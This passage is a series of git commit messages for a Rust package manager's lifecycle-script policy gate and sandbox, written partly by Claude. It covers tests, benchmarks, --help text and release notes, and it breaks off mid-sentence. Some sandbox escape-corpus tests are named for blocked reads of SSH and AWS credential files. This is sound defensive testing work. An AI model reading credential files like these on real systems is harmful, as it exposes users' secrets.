install pipeline's capture writer (which the harness can't
drive).
- `write_project_with_prior_binding` writes a `package.json`
with a `trustedDependencies` rich entry for the prior version,
using the on-disk wire shape (`scriptHash`, `behavioralTagsHash`,
`behavioralTags`) per `lpm-workspace::TrustedDependencyBinding`'s
serde renames.
## Local gate (touched crates)
```
cargo clippy -p lpm-workspace -p lpm-cli --all-targets -- -D warnings
# clean
cargo fmt --check
# clean
cargo test -p lpm-cli --test p7_version_diff_reference
# 6 passed; 0 failed (real subprocess runs in ~1.9s)
cargo test -p lpm-cli -p lpm-workspace
# 1657 passed; 0 failed across 11 test binaries (88 + 1573 + 84
# in test bins including the 6 new in p7_version_diff_reference)
```
Full workspace gate deferred to C6.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
§5.1 specifies allow as "runs every lifecycle script without the triage gate." Pre-fix, `build::run`'s default-branch selector filtered `to_build` to `is_trusted`-only at build.rs:254 regardless of policy, so allow behaved identically to deny at the CLI boundary — a P1-era gap flagged by v2.8 item 6. The P6 Chunk 2 helper-level test (p6_chunk2_allow_does_not_promote_green_tier_at_helper_level) pinned that `evaluate_trust` stays single-purpose by design; the caller-side half of that split had no guard. Bug-first test landed first (confirmed pre-fix red: 2/4 subprocess tests failed), fix extracts `widen_to_build_by_policy` as a pure helper so both the caller contract (Allow widens, Deny/Triage filter) and the `--all` escape-hatch override are independently unit-testable. Changes: - `widen_to_build_by_policy(scriptable, all, effective_policy)` — pure helper encapsulating the default-branch widening rule: `all || policy == Allow` → every scriptable package; else → filter to `is_trusted`. Triage's green-only promotion stays gated at `evaluate_trust` (P6 Chunk 2 contract preserved). - `build::run` default branch delegates to the helper. Specific- package path (with its warn-on-missing side effect) stays inline. - Both skipped-count warning sites gain `effective_policy != Allow` guards — "will be skipped" + trustedDependencies pointer is misdirection under allow because the widening folds every scripted package into the build set. Tests (bug-first, confirmed red pre-fix, green post-fix): - 4 subprocess tests in `p46_close_allow_widening_reference.rs`: project-manifest allow widens every tier; CLI override (`--policy=allow` + `--yolo` alias) also widens; deny keeps trusted-only filter + legacy pointer; triage does NOT widen beyond `evaluate_trust`-promoted greens (pins the allow-scoped boundary of the fix). - 4 pure-function unit tests next to the P6 helper guards: Allow includes untrusted; Deny filters to trusted; Triage filters to trusted (green promotion was already applied by the time scriptable_packages reached the helper); `--all` widens under every policy. Gates passing: - cargo clippy --workspace --all-targets -- -D warnings (clean) - cargo fmt --check (clean) - p46_close_allow_widening_reference: 4/4 pass - commands::build::tests: 49/49 pass (4 new + 45 pre-existing; includes all P6 Chunk 1/2/3 tests) - p6_triage_autoexec_reference: 5/5 pass (no regression) - p7_version_diff_reference: 6/6 pass (no regression) Install auto-build path composes correctly: install.rs calls build::run with `all=false` and a resolved `effective_policy`; under `scriptPolicy=allow + autoBuild=true`, the new helper widens to every scripted package, matching §5.1's autoBuild+allow row. Closes §5.1's "Partially shipped as of P6 (v2.8)" — flip to fully shipped happens in the Chunk 6 plan-doc close-out pass. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Reviewer flagged during Chunk 2 signoff that the shipped behavior no longer matched the --help text in `lpm install` and `lpm build`: - `--policy` (both commands) said "all three values currently behave identically to --policy=deny" — stale since P6 shipped tier-aware auto-execution for triage and Chunk 2 shipped allow-widening for `lpm build`. - `--yolo` said "currently a no-op that only logs the chosen policy" — stale since Chunk 2. - `--triage` said "currently a no-op" — stale since P6. After this chunk's selection-step widening, `build --policy=allow` / `--yolo` change execution selection, and `install` with `autoBuild=true` inherits that through `build::run`. The help text was user-visible contract drift on the binary's own --help output. Rewrites both sites to describe shipped behavior: - install --policy: enumerates deny/allow/triage with current semantics, names the two-phase invariant (install never runs scripts; policy governs auto-build + subsequent `lpm build`), notes Layer 4 (LLM triage) ships in 46.1. - install --yolo: alias for --policy=allow, auto-build + `lpm build` run every scripted package without tier gating. - install --triage: alias for --policy=triage, tiered gate with greens auto-approved in sandbox. - build --policy: enumerates deny/allow/triage at the selection step specifically; notes `--all` overrides every policy. - build --yolo: includes every scripted package regardless of trust; equivalent to `--all` at the selection step. - build --triage: greens auto-promoted into the build set. Bullet lists use blank-line paragraph breaks (`///` between each) so clap's help reformatter renders them as paragraphs, not a run-on line. Confirmed by inspecting `lpm install --help` / `lpm build --help` output post-rebuild. Gates passing: - cargo clippy --workspace --all-targets -- -D warnings (clean) - cargo fmt --check (clean) - p46_close_allow_widening_reference: 4/4 pass (no regression) Doc-only change; no behavior change. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Preview decisions without mutating persisted state. §11 P9 close-out
scope item per v2.10. Covers project + global surfaces explicitly per
the Chunk 3 signoff — project-mode byte-equality of `package.json`
alone would have missed the `--global` aggregate path.
## Surface
New `--dry-run` flag on `lpm approve-builds`. Combines with `--yes`,
`<pkg>`, the interactive walk, and with `--global` / `--json`. No-op
when combined with `--list` (already read-only — accepted silently
per signoff). JSON envelopes carry `"dry_run": true` so agents can
distinguish preview from live runs at parse time; human output
reframes "X approved" as "would approve X — no changes written" and
drops the `lpm build` next-step pointer.
## Mutation-site map
Project mode (`run`) — 3 write_back call sites:
- Line 289 (direct <pkg> approve, after confirm)
- Line 372 (--yes bulk)
- Line 547 (interactive walk, post-loop atomic write)
Global mode — 5 write_for call sites across 3 helpers:
- run_global_bulk_yes — 1 site (bulk aggregate write)
- run_global_named — 1 site
- run_global_interactive — 3 sites (grouped approve-all, grouped per-row,
non-grouped per-row)
Every site gains `if !dry_run { … }` around the mutation. Decision
accounting (approved / skipped vectors) still populates so the
summary surfaces the would-approve counts identically to a live run.
## Signature changes
- `run(project_dir, package, yes, list, dry_run, json_output)` —
new `dry_run` bool between `list` and `json_output`.
- `run_global(package, yes, list, group, dry_run, json_output)` —
new `dry_run` bool.
- Internal helpers (`run_global_bulk_yes`, `run_global_named`,
`run_global_interactive`) gain matching `dry_run` parameter.
- `print_summary` gains `dry_run` bool before `json_output`;
`#[allow(clippy::too_many_arguments)]` added with rationale
(wrapper struct would hurt readability more than 8 positional
args; fold only if a second command-level surface starts
consuming the same shape).
14 internal test-module call sites updated to pass `false` for the
new `dry_run` slot.
## Tests (6 new subprocess tests)
`crates/lpm-cli/tests/p46_close_dry_run_reference.rs`:
1. Project `--yes --dry-run --json`: `package.json` byte-equal
before/after; JSON has `"dry_run": true`; warning message
reframed as "DRY RUN — would blanket-approve…".
2. Project `<pkg> --dry-run --json`: `package.json` byte-equal;
JSON has `"dry_run": true`.
3. Project `--list --dry-run`: silent no-op — succeeds, no mutation.
4. Global `--yes --global --dry-run --json`: trust file stays
ABSENT on fresh fixture; JSON envelope has `"dry_run": true`,
`"scope": "global"`, warning reframed.
5. Global `<pkg>@<ver> --global --dry-run --json`: trust file
stays absent; matched package identity surfaces in `approved`
array for agent visibility.
6. Global `<pkg> --dry-run` against pre-seeded trust file:
byte-equal preserved — proves the short-circuit protects
existing state as well as fresh.
Fixture shapes for global mode hand-write `manifest.toml` (one
top-level install) + per-install `build-state.json` (one blocked
package). Matches the on-disk shape `lpm_global::write_for`
produces.
## Legacy-upgrade warning suppressed under dry-run
`print_summary`'s JSON `"legacy_upgraded_to_rich"` warning fires
when a legacy array-form `trustedDependencies` would have been
rewritten as the rich map form. Under `--dry-run`, no write
happens — the legacy array stays on disk. Surfacing "upgraded"
would lie, so the warning suppresses. Live-run behavior unchanged.
## Gates
- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- p46_close_dry_run_reference: 6/6
- p46_close_allow_widening_reference: 4/4 (no regression)
- p6_triage_autoexec_reference: 5/5 (no regression)
- p7_version_diff_reference: 6/6 (no regression)
- approve_builds::tests (unit): 73/73
- approve_builds_audit_regression: 6/6 (no regression)
106 total tests across the Phase 46 + approve-builds surface, green.
## Non-goals
- Interactive walk subprocess tests. Both project and global
interactive paths require a TTY; subprocess harness can't
provide one. Source-level audit of the 3 write sites inside
`run_global_interactive` + existing `approve_builds_yes_*`
unit-test coverage + the human-output DRY RUN messaging
together pin the contract.
- Empty-aggregate and --list JSON envelopes do NOT carry
`dry_run`. Those paths are structurally read-only; adding
the field would tell agents something redundant. Principle
of least surprise: passing a redundant flag shouldn't change
the output schema.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Reviewer flagged during Chunk 3 signoff that the help text + command- level doc comments promised "JSON envelopes carry \`\"dry_run\": true\` so agents can detect the mode" — but `--list` paths and empty-set short-circuits emitted envelopes without the field. An agent invoking `approve-builds --list --dry-run --json` or `approve-builds --dry-run --json` on an empty set couldn't detect dry-run from the envelope, contrary to the stated contract. Picked Option 2 from the reviewer's two paths: make the implementation universal rather than narrow the help text. Agents read `envelope.dry_run` without branching on mode; schema stays uniform across every approve-builds JSON surface. Sites updated (four emission points that produce JSON envelopes): - `run()` empty-set short-circuit at approve_builds.rs — inline `serde_json::json!` literal gains `"dry_run": dry_run`. - `print_listing()` — gains `dry_run: bool` parameter, threaded from `run()`'s caller. Envelope gains the field. - `run_global()` empty-aggregate short-circuit — gains `"dry_run": dry_run`. - `print_global_list()` — gains `dry_run: bool` parameter, threaded from `run_global()`'s caller. Envelope gains the field. One unit test updated: `print_global_list_handles_empty_aggregate_without_panicking` now exercises the new parameter axis in its smoke-test shape. ## Tests (2 new subprocess + 1 upgraded) - `p46_close_chunk3_project_list_dry_run_is_silent_no_op` upgraded: was exit-code-and-byte-equal-only; now also asserts `dry_run: false` on plain `--list --json` (baseline) and `dry_run: true` on `--list --dry-run --json`, proving the universal contract on the read-only path. - `p46_close_chunk3_project_empty_blocked_set_json_carries_dry_run_flag`: exercises the empty-set short-circuit (both `--yes` and `--yes --dry-run` paths emit the flag). - `p46_close_chunk3_global_list_json_carries_dry_run_flag_on_both_axes`: mirror for the global `--list` envelope via `print_global_list`. ## Gates - cargo clippy --workspace --all-targets -- -D warnings (clean) - cargo fmt --check (clean) - p46_close_dry_run_reference: 8/8 (was 6/6 pre-fix) - approve_builds::tests (unit): 73/73 (no regression) - approve_builds_audit_regression: 6/6 (no regression) - p46_close_allow_widening_reference: 4/4 (no regression) - p6_triage_autoexec_reference: 5/5 (no regression) - p7_version_diff_reference: 6/6 (no regression) 102 tests across the approve-builds + Phase 46 surface — one uniform contract for agents. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…e boundary §11 P9 close-out scope item per v2.10. Surfaces the 46.0 platform boundaries through the existing doctor harness so users see the sandbox-availability status and the project-only scope limit alongside other infrastructure checks. ## New checks ### 18. Sandbox availability probe (`Sandbox`) Constructs a synthetic SandboxSpec and calls `lpm_sandbox::new_for_platform(spec, SandboxMode::Enforce)`. Both backends' `new()` are memory-only (macOS Seatbelt renders an in-memory profile string; Linux landlock does one benign ruleset-create syscall to probe ABI), so the check costs nothing in persistent I/O and never races with running installs. Outcome map: - macOS / Linux (kernel >= 5.13) → `pass` — backend name + platform in detail (e.g., "seatbelt available on macos — lifecycle scripts run under Enforce mode") - Windows → `warn` with the §17.4 Phase 46.1 deferral pointer. Scripts still run today via `--unsafe-full-env --no-sandbox`, but `script-policy = "triage"` / `"allow"` opts out of the sandbox floor on Windows until 46.1 — users need to know. - Linux with kernel < 5.13 → `warn` with kernel version + landlock requirement + upgrade remediation. - Unexpected errors → `fail` with diagnostic detail. Shouldn't happen; the synthetic spec is well-formed. ### 19. Scope-boundary note (`Script policy scope`) Informational `pass` surfaced iff the global manifest carries at least one active install. The 46.0 script-policy surface covers project installs only; `lpm install -g` uses a separate Phase 37 trust store that 46.1 brings into the tiered-gate + sandbox fold per D19. Users without global installs don't see the note (avoids noise); users with globals see the forward pointer so the capability gap is explicit, not latent. ## Wiring Placed after the global-installs block (checks #14-17) in `doctor::run`, so the scope-boundary note sits visually next to the Phase 37 rows it contextualizes. Follows the existing `check_global_installs() -> Vec<Check>` aggregator pattern: `check_script_policy_surface() -> Vec<Check>` composes `probe_sandbox_backend()` (unconditional) + a conditional `scope_boundary_note_if_globals_present(root)` (only on non-empty globals). Split into three functions so each is independently testable without running the whole `doctor::run` pipeline — matches how the P6 close-out helpers were extracted. ## Tests (5 new unit tests in commands::doctor::tests) - `sandbox_probe_always_returns_a_check`: universal smoke — the probe must never panic, always emits a named `Check` with a non-empty detail line regardless of platform. - `sandbox_probe_on_macos_passes_with_seatbelt_backend` (`#[cfg(target_os = "macos")]`): macOS runners must Pass and the detail must name `seatbelt` for user debuggability. - `sandbox_probe_on_linux_passes_or_warns_never_fails` (`#[cfg(target_os = "linux")]`): Linux must be Pass (landlock present) or Warn (kernel too old), never Fail. CI runners with recent kernels hit the Pass arm; older boxes would hit Warn but the test passes either way — the contract is "no Fail on a supported platform." - `sandbox_probe_on_windows_warns_with_phase_46_1_pointer` (`#[cfg(target_os = "windows")]`): Windows must Warn with the §17.4 46.1 message present in the detail. - `scope_boundary_note_is_absent_when_no_global_installs`: fresh synthetic `LpmRoot` returns None. - `scope_boundary_note_fires_when_global_installs_exist`: seeded `manifest.toml` with one active install returns Some(Check), with "Phase 46.1" and "project installs only" in the detail. - `check_script_policy_surface_always_includes_sandbox_probe`: aggregator contract — sandbox probe always first, so a future refactor can't accidentally gate it behind a globals-exist check. Per CLAUDE.md cross-platform rules: Linux + Windows test bodies are `#[cfg]`-gated so they don't compile as dead code on the other platforms' CI runners. macOS CI runs 5 tests (universal + macOS-gated + 3 universal scope/aggregator); Linux runs 5 (universal + Linux-gated + 3); Windows runs 5 (universal + Windows-gated + 3). ## Gates - cargo clippy --workspace --all-targets -- -D warnings (clean) - cargo fmt --check (clean) - commands::doctor::tests: 70/70 (65 pre-existing + 5 new active on macOS) - p46_close_dry_run_reference: 8/8 (no regression) - p46_close_allow_widening_reference: 4/4 (no regression) - p6_triage_autoexec_reference: 5/5 (no regression) - p7_version_diff_reference: 6/6 (no regression) Verified live `lpm doctor` output on developer machine (macOS with global installs): ✔ Sandbox seatbelt available on macos — lifecycle scripts run under Enforce mode ✔ Script policy scope project installs only — global installs use a separate trust store at ~/.lpm/global/trusted-dependencies.json; Phase 46.1 extends the tiered gate + sandbox containment to globals ## Non-goals (deferred to 46.1 per v2.10 P9 trim) - LLM detection doctor entry. Pairs with P8 Layer 4. - Triage / policy config validation check (flagging typos in `package.json > lpm > scriptPolicy`). The install-time warning path at main.rs already surfaces typos; a second doctor-level check would be redundant until the user actually runs the command. Queue if users report hitting the gap. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…line snapshot
§11 P9 close-out scope item per v2.10. Two separate pieces per the
Chunk 5 signoff — wall-clock benchmarking on the 51-pkg fixture,
subprocess golden snapshot on a 2-pkg deterministic fixture.
## bench_cold_install_triage (bench/run.sh)
Reuses the existing 51-pkg fixture (17 direct deps resolving to 51
packages). Two axes against the deny baseline, matching amended
§12.7:
- Axis 1 (autoBuild off) — classification-only overhead. Measures
P1 metadata plumbing + P2 static-gate classification cost during
install timeline, scripts dormant. Target: ≤5% regression vs
deny on the same fixture.
- Axis 2 (autoBuild on) — execution-path overhead. Measures P5
sandbox spawn + P6 tier-aware auto-execution on green-classified
scripted packages. Target: ≤15% regression vs deny on the same
fixture.
Uses the existing `median_ms_ab_with_setup` helper with alternating
A/B run order per iteration so CDN / kernel-cache state can't
bias a single arm. Output includes a per-axis delta with the
target threshold inline for eyeball triage.
`format_delta` helper added for the percentage math (integer
bash arithmetic to whole-percent granularity — sufficient signal
at the wall-clock variance install benches show). Smoke-tested
in isolation: 100→105 = 5%, 100→120 = 20%, 100→95 = -5%, 0→100 =
"baseline 0ms — cannot compute delta" guard.
Wired into dispatch + `all` group + usage message. The
`workflow_dispatch` bench job in CI picks up the new arm
automatically via the `all` expansion.
v2.10 §0 item 3 documented why this reframes the original
"≤5% on no-scripts case, ≤15% on scripts case" gate — a
postinstall-free fixture produces a vacuous zero-by-construction
delta, so the honest measurement is the two-axis split on a
realistic fixture.
## Deterministic baseline snapshot (lpm-cli/tests/p46_close_policy_deny_baseline.rs)
The §18 "zero-regression guarantee for the default" contract
transposed onto a subprocess-driven byte-equal golden:
- 2-pkg synthetic fixture: trusted-pkg (legacy bare-name entry
in package.json > lpm > trustedDependencies) + untrusted-pkg
(no binding). Under --policy=deny, the default-branch filter
includes the trusted one and drops the untrusted one.
- `lpm build --dry-run --policy=deny --json` on this fixture
produces deterministic stdout because serde_json's
preserve_order feature is on workspace-wide + the one-script
shape avoids HashMap iteration nondeterminism.
- Golden committed at
`tests/fixtures/p46_close_policy_deny_baseline.stdout` (13
lines). Any drift — intentional schema evolution or
accidental regression — forces the developer to touch this
file and decide. Re-capture with `UPDATE_GOLDEN=1`.
Why `lpm build --dry-run` and not `lpm install` directly: real
install against a synthetic fixture needs network or wiremock,
both out of 46.0 close-out scope (v2.9 residual gap). The
dry-run JSON output is a direct function of the post-install
persisted state, and under deny its shape is the pre-Phase-46
contract verbatim — sufficient for the zero-regression
guarantee. The test module's doc comment spells this out for
future readers.
Two tests:
- `p46_close_chunk5_policy_deny_dry_run_json_matches_golden` —
byte-equal assertion. Manually verified by mutating the
golden ("echo hi" → "echo drift") pre-commit: test failed
with a clear diff pointing at the drifted line + the
UPDATE_GOLDEN recovery command. Then restored.
- `p46_close_chunk5_policy_deny_dry_run_json_stdout_is_clean_json` —
stream-separation sanity: stdout parseable, single package,
trusted flag present. Pairs with the golden to catch stream
bleed.
## Scope decisions
- Golden captures stdout only. Stderr contains ANSI + cliclack
formatting that varies across terminal widths and versions;
byte-equal on stderr would flake.
- Fixture uses `lpm build`, not `lpm install`. Documented
rationale in the test module's doc comment (network vs
wiremock scope).
- Bench is manual-trigger only (CI's `bench: workflow_dispatch`
job). Not gating PR merges; purely a measurement tool.
## Gates
- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- bash -n bench/run.sh (clean)
- p46_close_policy_deny_baseline: 2/2
- p46_close_dry_run_reference: 8/8 (no regression)
- p46_close_allow_widening_reference: 4/4 (no regression)
- p6_triage_autoexec_reference: 5/5 (no regression)
- p7_version_diff_reference: 6/6 (no regression)
- Bench dispatch smoke: `./bench/run.sh cold-install-triage`
appears in the "Available:" list and routes correctly.
## Non-goals
- Running the full bench for real in this commit. Real
cold-install takes network + ~60-90s for 2 axes × 3 runs ×
2 arms. The bench job runs on workflow_dispatch only; this
commit ships the harness, not the measurement. When the
release manager cuts 46.0 they'll run the bench manually
to confirm the ≤5% / ≤15% gates hold on the reference
machine and record the baseline in `bench/baselines/`.
- Snapshot on `lpm install` directly. Requires wiremock or
real network — explicitly deferred per v2.9 residual gap.
- Multi-package script-hash drift regression tests. Covered
by P6/P7 reference fixtures at a different granularity.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…erhead Reviewer flagged during Chunk 5 signoff that the original wording over-claimed. Axis 2 was labeled "execution-path overhead" for P5 sandbox spawn + P6 tier auto-execution, but on the current 51-pkg bench fixture no packages have `preinstall` / `install` / `postinstall` scripts — `EXECUTED_INSTALL_PHASES` at crates/lpm-security/src/lib.rs:70 is exactly those three phases, and the pure-JS fixture (zod, dayjs, lodash, etc.) uses only `prepare` / `prepublishOnly` which are not in LPM's executed set. So the autoBuild=on arm walks install → should_auto_build → build::run → `evaluate_trust` per package → empty scriptable set → early return. That's a measurable control-path walk, but the sandbox never spawns and P6 auto-execution never fires. The original "≤15% execution-path overhead" target was unsound as stated on this fixture. Picking Option 2 from the reviewer's two natural next steps (relabel + defer true-execution bench, rather than curate a script-bearing fixture now). Fixture curation is a separate workstream: pinning a green-classified preinstall/install/ postinstall package whose own script duration doesn't dominate the sandbox spawn cost, keeping it reproducible across time, deciding which package class is representative, etc. — genuine design work that doesn't fit a close-out chunk scope. ## Bench changes - Axis 2 relabeled: "auto-build CONTROL-PATH overhead (autoBuild on)" — not "execution-path overhead." - Axis 2 target: ≤5% (same as Axis 1), matching what a control-path walk realistically costs; the ≤15% was premised on sandbox spawn ~10ms/script overhead that doesn't apply here. - Header comment gains a ⚠ block pointing at EXECUTED_INSTALL_PHASES, naming the missing script classes in the fixture, and stating the deferral. - Per-run output line gains a `note:` follow-up clarifying "control-path only (no scripts in fixture); execution-path bench deferred." ## Plan-doc follow-up §0 v2.11 on `phase-46-p4-server-side` of `a-package-manager` documents the audit + narrows §12.7's Axis 2 claim to match. Landing separately; both commits together complete the corrected Chunk 5. ## Gates (no code change behind the relabel) - bash -n bench/run.sh (clean) - cargo clippy --workspace --all-targets -- -D warnings (clean) - cargo fmt --check (clean) - All Phase 46 regression suites: 25/25 (no semantic change) Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
The bench harness hardcoded `$BENCH_DIR/.work` (inside the repo),
which lives under a VS-Code-watched tree. Every `cold-install-clean`
iteration writes ~25 MB / thousands of files into `node_modules/`,
triggering FSEvents → VS Code's file-watcher → `@vscode/ripgrep`
scans with `--no-ignore --follow` (which bypasses the `.gitignore`
exclusion of `bench/.work`). The rg workers spawn faster than they
reap, accumulate, and eventually saturate the macOS `-u`
(processes) ulimit (~2666 on Apple Silicon). At saturation, new
forks — DNS helpers, tokio worker threads, anything — stall with
`resource temporarily unavailable`, and the whole machine looks
frozen while benches run. This was diagnosed during the 46.0
tag-cut A/B cross-binary validation on 2026-04-23.
Two small env knobs pull the harness out of the watched tree:
- `BENCH_WORK_DIR` — redirects the per-iter scratch path; default
`$BENCH_DIR/.work` preserved for CI compat.
- `BENCH_PROJECT_DIR` — redirects the fixture `package.json`
source; default `$BENCH_DIR/project` preserved.
Example: the 46.0 A/B across a larger fixture runs with
BENCH_WORK_DIR=/tmp/lpm-bench BENCH_PROJECT_DIR=/tmp/lpm-large-fixture \
./bench/run.sh cold-install-clean
No binary / logic change — pure harness path ergonomics. Preserves
all existing bench invocations bit-for-bit.
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
The helper `build_blocked_set_metadata` in install.rs previously walked `for p in packages` and `.await`ed `get_package_metadata` (resolver TTL cache lookup) + `fetch_provenance_snapshot` (attestation fetch, cache-first) **serially per package**. Even with both caches warm, that's two async boundary crossings per package — ~3 ms of overhead each — which stacks linearly with the resolved dep count. Measured on a 277-package fixture during the 46.0 tag-cut A/B cross-binary validation on 2026-04-23 (main vs phase-46 under `--policy=deny`, same fixture, order-alternated to cancel CF edge warming): - **Pre-fix:** +32 % median wall-clock regression (+770 ms). - **Post-fix:** +6–8 % median wall-clock (+170–200 ms), within the ±10 % noise floor the 2026-04-10 baseline doc calls out for this class of measurement. Net: ~570 ms saved on a 277-pkg fixture. The residual ~200 ms lives in the post-stage `capture_blocked_set_after_install_with_metadata` pass (per-package `compute_script_hash` + `read_install_phase_bodies` on the store tree + trust-snapshot write) — legitimate Phase 46 security work that wasn't present in main; leaving that for a follow-up perf pass if it ever surfaces as a user complaint. Shape of the fix: collect the per-package async block into a `Vec<impl Future<Output = Option<(...)>>>` and run them through `futures::future::join_all(...).await`, then fold into `out` sequentially. Order is preserved (join_all is positional), so behaviour is byte-identical to the serial version — this is a pure concurrency win, no logic or output change. `out` is keyed by `(name, version)` so the final map is the same. Scope: touches `build_blocked_set_metadata` only (call site of the serial loop). Related per-package patterns elsewhere in install.rs that still use serial awaits: - L1674 — minimum-release-age gate (`block_in_place + block_on` per package). Only fires on `!allow_new && !used_lockfile`, so users either hit the cooldown warning once and re-run with `--allow-new`, or bypass it entirely via project config. Not the common path. - L1803 — provenance-drift gate. Gated on `has_rich_approvals = false`, which short-circuits for every project that hasn't yet written any rich-form `trustedDependencies` entries (i.e. everyone today). Both would benefit from the same fanout treatment but neither triggers for the common `lpm install` invocation the bench measures, so leaving them for a follow-up rather than growing the 46.0 close-out. 🤖 Generated with [Claude Code](https://claude.com/claude-code) Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Captures the 2026-04-23 tag-cut bench data alongside the existing 2026-04-10 Phase 32 baseline: - §12.7 cold-install-triage axes 1/2 (2026-04-22 23:45 reading): triage vs deny both inside ≤5% target per §12.7 v2.11. - §13.1 A/B cross-binary (main vs phase-46 under --policy=deny): 10-iter order-alternated median = **+7.8%**, within the 10% noise floor called out in the 2026-04-10 baseline. - Per-stage JSON breakdown — localizes the residual delta to the post-stage capture_blocked_set_after_install_with_metadata pass (legitimate Phase 46 security work, not present in main). Also documents the two other per-package serial-await hotspots (L1674 minimum-release-age, L1803 provenance-drift) as backlog items — neither triggers on the common `lpm install --allow-new` invocation benchmarked here. 🤖 Generated with [Claude Code](https://claude.com/claude-code) Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Phase 46.0 — tiered script-policy gate (runner vision). ## Highlights Phase 46.0 ships the four-layer tiered gate defined in `DOCS/new-features/37-rust-client-RUNNER-VISION-phase46.md`: - **P1** — schema extensions (`script-policy`, `trustedDependencies` rich form with integrity + script_hash + provenance binding), `ScriptPolicyConfig` loader, `--policy=deny|allow|triage` flag, `--yolo` / `--triage` shorthands, trust-snapshot persistence + diff. - **P2** — static-gate classifier. Regex-based tokenization with green allowlist, red denylist, amber compound-script fallback. ≥500-entry fixture corpus locked; ≥60% green rate on non-adversarial entries; zero false-positive reds. - **P3** — cooldown (`--min-release-age` + global config key, `minimumReleaseAge` in `package.json`). Wraps the existing `--allow-new` override with a narrower numeric override path. - **P4** — provenance-drift gate. Fetches Sigstore attestation identities from registry.npmjs.org, compares against approved snapshot, blocks on "provenance dropped" or "identity changed" (publisher rotation). `--ignore-provenance-drift[-all]` overrides for per-package / per-install waivers. - **P5** — filesystem-scoped sandbox (macOS Seatbelt backend). Approved-script execution inside per-run fileset scope; §12.5 escape test blocked; green-corpora compat green. - **P6** — tier-aware auto-build (hard-gated on P5). `build::run` auto-approves greens under `triage`; `all_scripted_packages_trusted` is tier-aware; non-TTY autoBuild + triage snapshot test green. - **P7** — version-diff UI. Behavioral-tag delta render, script-hash drift card on `approve-builds --list`, JSON enrichment (SCHEMA_VERSION 2→3 + per-entry `version_diff`). - **P9** — close-out. `cold-install-triage` bench green (Axis 1 −15%, Axis 2 +3% vs deny, both ≤5% target). Next.js 16.2.4 red-count = 0 validation on 2026-04-22. Cross-binary A/B on 277-pkg fixture: +7.8% median wall-clock (within the ±10% noise floor). P8 (LLM triage harness) is **deferred to Phase 46.1**. Hard precondition P5 + P6 are shipped; the LLM detection + constrained verdict schema lands in the follow-up phase. ## Release tag-cut fixes (this session) - `ed001fa` — bench harness honors `BENCH_WORK_DIR` + `BENCH_PROJECT_DIR` env overrides so running `cold-install-clean` doesn't trigger VS Code's `--no-ignore` rg search storm on the workspace `bench/.work` tree. - `f19d23e` — `install.rs > build_blocked_set_metadata` fanned out through `futures::future::join_all`. Serial per-package `.await`s on metadata + provenance lookups were adding ~770ms to deny-mode wall-clock on a 277-package tree; fanout drops that to ~200ms (noise floor). Tree output is byte-identical to the serial version. - `4607f4f` — `bench/baselines/2026-04-23-46.0-macos-arm64.md` records the tag-cut readings and documents two other per-package serial-await hotspots (L1674 minimum-release-age, L1803 provenance-drift) as backlog items. ## Release artifacts - Workspace `Cargo.toml` (0.22.0 → 0.23.0) + 5 `npm/cli-*/package.json` (same bump). - `Cargo.lock` auto-synced via `cargo check --workspace` (gitignored; CI re-syncs on its own). - Local CI gate green: - `cargo clippy --workspace --all-targets -- -D warnings` - `cargo fmt --check` - fancy-regex guard - `cargo build --workspace` - `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast` — 4217/4217 - `cargo test -p lpm-auth` × 3 under default parallelism — 47/47 each, deterministic 🤖 Generated with [Claude Code](https://claude.com/claude-code) Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
The test module in `lpm-cert/src/trust.rs` contains a single test that is `#[cfg(target_os = "macos")]`. On Linux CI, the test itself is filtered out at compile time, leaving the enclosing `mod tests` with an empty body and a now-unused `use super::*`, which fails `cargo clippy -- -D warnings` per the `unused-imports` rule. Local `cargo clippy --workspace --all-targets -- -D warnings` on macOS didn't catch this because the macOS test IS compiled and DOES use the `login_keychain_path` symbol via `super::*`. Only the Linux runner surfaces the drift. Per the Rust CLI cross-platform hygiene rules in `a-package-manager/CLAUDE.md > Rust CLI Code Rules`: > Move platform imports into the function body — If a `use` > import is only needed inside a `#[cfg]` block, put the `use` > inside that block, not at the top of the file. Simpler here: qualify `super::login_keychain_path` at the one call site and drop the `use` entirely. The module has no other imports. No functional change. Pre-existing hygiene bug surfaced by the phase-46 PR run on #7 (tagging v0.23.0 fired the Release workflow from the tag and succeeded; the PR CI event is what runs the Linux lint job). 🤖 Generated with [Claude Code](https://claude.com/claude-code) Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…y-test fix) The §12.5 escape-corpus read tests and the two in-module write/read deny tests in `linux.rs` placed their "forbidden" probe files under `tempfile::tempdir()`. On macOS this resolved to `/var/folders/.../T/.tmpXXX/` — outside every sandbox rule, so Landlock/Seatbelt correctly denied access and the tests asserted that denial. On Linux, `tempfile::tempdir()` defaults to `/tmp/.tmpXXX/`, and `/tmp` is in the Landlock RW allow list by design (see compat_greens `tmp_scratch_write_shape_succeeds` — many real-world postinstalls hardcode `/tmp/...` paths for intermediate artifacts and the sandbox must not break them). Every probe landed INSIDE the allow list, Landlock correctly permitted it, and the tests then asserted denial → FAIL. Five failing tests on #7's Linux CI, all of this shape: - lpm-sandbox::linux::tests::denies_write_outside_allow_list_under_enforce - lpm-sandbox::linux::tests::enforces_deny_on_read_outside_allow_list - lpm-sandbox::escape_corpus::block_read_of_file_outside_allow_list - lpm-sandbox::escape_corpus::block_read_of_ssh_credential_shape_path - lpm-sandbox::escape_corpus::block_read_of_aws_credentials_shape_path Root cause: the *tests* picked a probe location that on Linux happens to overlap the 